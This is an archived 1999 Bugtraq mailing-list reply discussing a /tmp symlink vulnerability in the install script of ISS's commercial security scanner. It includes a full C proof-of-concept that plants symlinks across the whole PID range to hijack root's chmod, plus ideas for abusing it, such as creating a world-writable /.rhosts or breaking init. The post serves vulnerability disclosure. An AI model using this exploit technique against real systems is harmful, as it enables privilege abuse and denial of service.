[9733] in bugtraq
Re: ISS install.iss security hole
daemon@ATHENA.MIT.EDU (Joel Eriksson)
Mon Feb 22 15:49:47 1999
Date: Mon, 22 Feb 1999 13:35:21 +0100
Reply-To: Joel Eriksson <na98jen@STUDENT.HIG.SE>
From: Joel Eriksson <na98jen@STUDENT.HIG.SE>
X-To: Fyodor <fyodor@DHP.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.4.04.9902202023190.5697-100000@shell.dhp.com>
On Sat, 20 Feb 1999, Fyodor wrote:
> Today I downloade the latest trial version of Internet Security Scanner
> for Linux (version 5.3).
>
> The install program (shell script) requires that you be root, even if you
> want to install ISS in your home directory. I decided to edit the script
> to comment out the root-check, and was rather shocked when I saw what they
> are doing in install.iss:
>
> # Only root can pass the next four operations.
> # Yes it's ugly - BUT IT WORKS!
> touch /tmp/.root.$$ >> /dev/null 2>&1
> chmod 600 /tmp/.root.$$ >> /dev/null 2>&1
>
> Obviously this is vulnerable to the standard tmp-symlink problem. And
> they don't even look for the file first, so there is no need to worry
> about exploiting race conditions -- just stick the 65K symlinks in /tmp
> and wait for root to install ISS (you might have to wait a while ;). I've
> tested that you can chmod whatever file you want to 600. This could make
> for an easy DOS, but off the top of my head I don't see much more exploit
> potential.
One other issue that I see with this is:
--- start of stupid 3xPl0i+ example
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
#define MINPID 1
#define MAXPID 65535
int main(int argc, char **argv)
{
char filename[16+1]; /* Assuming MAXPID = 65535 or at least a five digit number */
struct stat buf;
int i;
if(argc != 2) {
fprintf(stderr, "Usage: %s <file-to-create>\n", argv[0]);
exit(1);
}
memset(filename, 0, sizeof(filename));
for(i=MINPID; i<=MAXPID; i++) {
snprintf(filename, 17, "/tmp/.root.%d", i);
symlink(argv[1], filename);
}
memset(filename, 0, sizeof(filename));
while(stat(argv[1], &buf) == -1);
for(i=MINPID; i<=MAXPID; i++) {
snprintf(filename, 17, "/tmp/.root.%d", i);
unlink(filename);
}
printf("%s was created. Filemode = 0%o\n", argv[1], buf.st_mode & 0666);
if(! access(argv[1], W_OK))
printf("I suppose you got lucky... (Or ran this as root.)\n");
else
printf("Sorry, no write permissions for you...\n");
exit(0);
}
--- end of stupid 3xPl0i+ example
For those who can't code, or does not see my point, if root has a
stupid umask this vulnerability may be exploited to create for example
a world-writeable /.rhosts (I suppose the ISS-script does not change
umask to 077, since they do a chmod on the file).
No matter what the umask is it could easily be made to perform a DoS-attack,
what about changing the permissions on for example `which init` to 600...
Anyone with a little imagination could think of other possibilities.
> While this is probably not going to be exploited much (if ever), it really
> concerns me that kindergarden-level security holes are still present in
> current mass market **security** software. Remember that ISS chooses not
> to offer us (or even paying customers!) the source code for their scanner.
> So we have to trust ISS programmers are highly competent and aware of
> secure coding issues. When I find problems like the one above without
> even looking for them, I have to wonder whether this trust is misplaced.
That is the BIG issue here. My exploit example is a possible attack, but
there is still a rather small chance of it being successfully used for
something else than a DoS-attack since we have to unlink the symlink
before the chmod occurs, and since root must have a stupid umask...
What really does disturb me, just as Fyodor, is that this really basic
kind of securityhole exists in a commercial securityscanner, that is
supposed to find other securityflaws on its customers systems. If I was an
ISS customer I would start to worry just about, now...
> Cheers,
> Fyodor
>
> PS (shameless plug): Version 2.08 of the nmap security scanner is
> available free, with source code, at http://www.insecure.org/nmap/
It's a great tool! :-)
/ Joel Eriksson - Systems / Security administrator, Network engineer, Programmer, UNIX Guru
